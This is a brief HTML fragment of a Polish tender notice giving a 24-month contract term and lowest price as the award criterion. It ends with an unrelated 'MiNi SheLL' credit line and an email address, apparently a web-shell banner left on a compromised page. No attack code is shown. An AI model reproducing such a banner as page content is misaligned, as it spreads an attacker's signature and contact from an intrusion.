<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com